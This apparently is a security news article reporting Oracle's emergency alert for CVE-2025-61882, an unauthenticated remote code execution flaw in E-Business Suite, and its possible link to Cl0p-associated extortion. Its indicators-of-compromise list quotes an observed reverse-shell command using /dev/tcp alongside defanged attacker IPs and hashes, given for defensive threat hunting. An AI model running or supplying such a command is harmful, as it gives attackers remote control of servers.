CVE-2025-61882 (CVSS 9.8): Critical RCE Flaw in Oracle E-Business Suite

Oracle has issued an emergency Security Alert addressing a critical vulnerability (CVE-2025-61882) in Oracle E-Business Suite, warning that the flaw can be remotely exploited without authentication to achieve remote code execution (RCE). The vulnerability has been assigned a CVSS score of 9.8, underscoring its severity and potential for widespread exploitation.

According to the advisory, “This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.”

That means attackers could compromise affected Oracle E-Business Suite systems simply by sending crafted network requests, allowing them to run arbitrary commands on the server without needing valid credentials. Such an attack could result in full compromise of business-critical applications, data exfiltration, or lateral movement within enterprise environments.

The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14.

Oracle’s patch is now available, but the company cautions that “the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.” Customers must therefore ensure older patch levels are installed before applying the new fix.

The vendor emphasized urgency: “Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

To assist organizations with immediate threat hunting, Oracle included several Indicators of Compromise (IOCs) that have been observed in active exploitation attempts:

• Malicious IP addresses:
  • 200[.]107[.]207[.]26
  • 185[.]181[.]60[.]11
• Observed commands:
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 — a command commonly used to establish reverse shells for remote control.
• Associated file hashes (SHA-256):
  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

These indicators suggest that attackers are already attempting to exploit vulnerable Oracle environments in the wild. Organizations are urged to cross-check system logs and network telemetry for connections to these IPs or execution of similar shell commands.

It is unclear whether this vulnerability is related to Oracle’s recent cybersecurity incident. Recenlty, cybersecurity experts are on high alert as a group claiming ties to the infamous Cl0p ransomware gang bombards global companies with threatening emails claiming to possess stolen data from Oracle’s E-Business Suite—a mission-critical platform for managing finance, HR, and supply chain operations.

The activity, which began on or before September 29, 2025, has prompted urgent investigations by both Mandiant and the Google Threat Intelligence Group (GTIG), as organizations scramble to determine whether their systems have been breached or if the campaign is purely an extortion ploy.

In response to the campaign, Oracle issued a Security Alert confirming awareness of the extortion attempts targeting Oracle E-Business Suite (EBS) customers.

Rob Duhart, Oracle’s Chief Security Officer, stated: “Oracle is aware that some Oracle E-Business Suite customers have received extortion emails. Our ongoing investigation has found the potential use of previously identified vulnerabilities that are addressed in the July 2025 Critical Patch Update.”

Related Posts:

• Oracle April 2025 CPU: 378 Security Patches Released
• CISA Sounds the Alarm on Actively Exploited Apple and Oracle Zero-Days
• CISA Warns of Credential Risks Tied to Oracle Cloud Breach
• Oracle Discloses Second Hack (Client Login Data)
• Hackers target Oracle WebLogic Servers after the release of PoC code